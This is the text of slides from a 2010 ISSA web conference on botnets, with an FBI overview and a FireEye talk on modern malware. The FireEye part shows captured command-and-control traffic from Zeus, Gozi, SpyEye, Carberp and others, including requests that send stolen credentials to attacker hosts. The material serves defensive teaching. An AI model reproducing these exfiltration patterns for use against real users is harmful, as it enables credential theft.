Botnets Sponsored by:
ISSA Web Conference October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London
1 Welcome: Conference Moderator
Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences Committee
2 Agenda • How Botnets Have Evolved – Chris Calderon - Special Agent, FBI
• Rooting Out the Bad Actors – Alex Lanstein - Systems Consulting Engineer, FireEye
• Joint Speaker Question & Answer
• Closing Comments
3 UNCLASSIFIED
How Botnets Have Evolved
presented by Special Agent Chris Calderon FBI UNCLASSIFIED UNCLASSIFIED Agenda
• What is a botnet? • How are botnets created? • Why are botnets created? • Basic structure of a botnet • Taking down a botnet • How botnets are evolving • Botnets in the news • Questions
UNCLASSIFIED UNCLASSIFIED What is a botnet?
• A network of compromised computers (robots/bots) • Controlled by a bot master / herder • Used to carry out various illegal activities • Services are often sold to other criminal elements
UNCLASSIFIED UNCLASSIFIED How are botnets created?
• Obtain reliable infrastructure Setup • Develop malware and C&C software
• Malware loaded onto victim machines Victims • Done through exploits and/or social engineering
• Continually update software / instructions to bots Manage • Maintain statistics for the botnet
UNCLASSIFIED UNCLASSIFIED Why are botnets created?
• Spam • Distributed Denial of Service (DDoS) • Click Fraud • Fake Anti-Virus • Credential Theft • Proxy Service • Cyber Warfare
UNCLASSIFIED UNCLASSIFIED Basic Structure
Victim C&C Server Bot Master / Victim Herder C&C Victim Server
UNCLASSIFIED UNCLASSIFIED Taking down a botnet
Victim C&C Server Bot Master / Victim Herder C&C Victim Server
UNCLASSIFIED UNCLASSIFIED Botnets evolving
Proxy Victim C&C Server Victim Proxy Bot Master / Herder Victim
C&C Proxy Victim Server
UNCLASSIFIED UNCLASSIFIED Botnets evolving
Proxy Victim C&C Proxy Server Victim Proxy Bot Master / Herder Victim
C&C Proxy Proxy Victim Server
UNCLASSIFIED UNCLASSIFIED Botnets in the news
• ZEUS – Steels and logs online banking credentials – Primarily targets high balance accounts – Money “mules” used to get money to bad actors – Kit now used by many different groups – Estimated $70,000,000 stolen from US banks
UNCLASSIFIED UNCLASSIFIED Botnets in the news
• MARIPOSA (BUTTERFLY) – Steels online credentials, and also used in DDoS attacks – Estimated 12 million infected computers – Bad actors traced to Spain and arrested – Criminal proceedings ongoing
UNCLASSIFIED UNCLASSIFIED Botnets in the news
• SPAM BOTS – Conficker, Cutwail, Waledac, …. – Up to 10 million bots per botnet – Each botnet can send billions of spam emails per day – Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising, ….
UNCLASSIFIED UNCLASSIFIED
Questions?
UNCLASSIFIED Rooting out the Bad Actors or: p2p, fast flux, and other botnet myths
Alex Lanstein Senior Security Researcher FireEye, Inc. Today’s Agenda
• Understanding the shift from conventional to modern malware, and the resultant hosting needs
• A few TT&P to uncover older or moderately sophisticated malware
• A detailed looked a few bots “in the news”
2
18 Conventional vs. Modern, APT Malware
Conventional Malware
• Characterized by using “spreading” techniques, custom C&C transport protocols, IRC communication – Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots
• Detectable through a variety of technologies/tactics: – NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS
– Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc.
3
19 Conventional vs. Modern Malware
Modern-ish malware:
– Characterized by infecting via browser based exploits
– Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C Callback over HTTP(s)
– Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye
– Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed
4
20 World’s Top Malware
Source: FireEye Malware Intelligence Lab
21
21 Modern Malware Infection Lifecycle
1 System gets exploited . Drive-by attacks in casual browsing . Links in Targeted Emails Compromised . Socially engineered binaries Web server, or Callback Server Web 2.0 site 2 Dropper malware installs . First step to establish control . Calls back out to criminal servers Perimeter Security Signature, rule-based . Found on compromised sites, and Web 2.0, user-created content sites Other gateway 3 Malicious data theft & long- List-based, signatures term control established . Uploads data stolen via keyloggers, Trojans, bots, & file grabbers . One exploit leads to dozens of infections on same system . Criminals have built long-term control mechanisms into system Desktop antivirus Losing the threat arms race 22
22 Where is all this malware being hosted?
• Previously we used to see malware being hosted on infected home machines
• Web filters responded by blocking access to domains that had multiple A records in residential IP space
• Now it’s being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space!
23 Root of the Problem
• There is no “Internet Police”!
• Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
• Depends who you ask and how big a stink you make.
24 How the Internet is delegated
In the name space (think DNS):
• ICANN Registries • Registries == Verisign, Affilias, ccTLD operators • Registries sell to certified gTLD and regional registrars • Registrars == namecheap.com, godaddy.com, netsol.com • Registrars sell to registrants (end user)
25 How the Internet is delegated
In the IP space:
• ICANN/IANA (Internet Assigned Numbers Authority) • IANA RIRs • RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC • RIRs LIRs • LIRs are generally data centers and ISPs
26 27 28 29 ICANN’t do anything!
• ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn’t violate the contract. These contracts have no mention of “content”. • Recent success against EstDomains was due to them having a convicted felon as an Officer of the company. • Large pushback when someone even suspects they are trying to take an authoritative stance on something.
30 31 32 Big bots in 2010 Rustock – still sticking around
POST /index.php?topic=33.117 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://go-thailand-now.com/ Content-Type: application/x-www-form-urlencoded Content-Encoding: gzip UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: go-thailand-now.com Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache
18
34 Gozi
POST /cgi-bin/forms.cgi HTTP/1.0 Content-Type: multipart/form-data; boundary=------139b9b3139b9b3139b9b3 User-Agent: IE Host: 91.216.215.130 Content-Length: 453 Pragma: no-cache
------139b9b3139b9b3139b9b3 Content-Disposition: form-data; name="upload_file"; filename="3759777034.21" Content-Type: application/octet-stream
URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901 FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove ------139b9b3139b9b3139b9b3--
19
35 Zeus
POST /xed/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF) Host: schastlivieiveselierebyta0001.com Content-Length: 329 Connection: Keep-Alive Cache-Control: no-cache
. ....4...A..2.`.Ul...T...... (....4pP.u.x.!.D.!.+...... q.. '7...... 7.....D.0..Y...$...... [(...F...c.|e.y...g.b..t.x...... - [email protected]>.s..j=. ..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I.`:...... ".....;5..U. .t....!...... f.=E.....0Y,.. ..".<.
20
36 Tigger – Not just financials anymore
POST /track_c.cgi HTTP/1.0 Content-Length: 81 icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L .
SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login
Title:
37 SpyEye – ZeuS replacement?
GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232 &ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKL AF24&md5=9012ab902413dcf8gga89 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: hahsdhsl.com Pragma: no-cache
GET /maincp/gate.php?guid=user2!ND93103!893CND1 &ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889 712214bdbee8381337 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: www.promohru.in Pragma: no-cache
22
38 Carberp – Yet Another Datastealer
POST /recv.php HTTP/1.1 Host: 194.54.80.146 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en- US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html Connection: Close Content-Type: application/x-www-form-urlencoded Content-Length: 331 uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1 &data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom% 2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7 CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww %2Estarwoodhotels%2Ecom%252Fpreferredguest%252Finde x%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2EC OM%26persist%3Dtrue%26password%3Dmypassword
23
39 TDSS – Full on SSL
• 19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528: tcp 620 ....E [email protected]...... J[z7l.:...... J...F..L...N.]...xmvF..(..l...?},,nc{. .ygs.R...._...... 8.a#9cU....I..5...... 0...0..j. ...yV.9.x0 . *.H...... 0E1.0 ..U....AU1.0...U…Some-State1!0...U...Internet Widgits Pty Ltd0.. 100114192303Z. 110114192303Z0E1.0 .U....AU1.0...U…Some-State1!0...U...Internet Widgits Pty Ltd0..0 . *.H...... 0...... |.<..7...dt..IF0.~...;-..m.>.~Ra!f...- [email protected] ....]P.*.....W.C...N5.(...Ux.z.._....W...b....*.P....AX.....(...... E.....0 . *.H...... @..p.Iru...Q.$K)..EF;....u.X...... <... .;}....aa~>r.l.\...... [.r.0@...... %....S`...p.... .=3;[email protected]^7...... "Zw..5.)g......
24
40 Thank you!
Alex Lanstein [email protected]
www.fireeye.com For late-breaking malware research and news: blog.fireeye.com
41
FireEye, Inc. Confidential 41 Joint Speaker Question & Answer
• Chris Calderon – Special Agent, FBI • Alex Lanstein – Systems Consulting Engineer, FireEye
42 Closing Remarks
Thank you to FireEye for their support of ISSA and this Web Conference
Thank you to Citrix for donating this Webcast service
Online Meetings Made Easy
43 CPE Credit
• Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz.
• After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.
44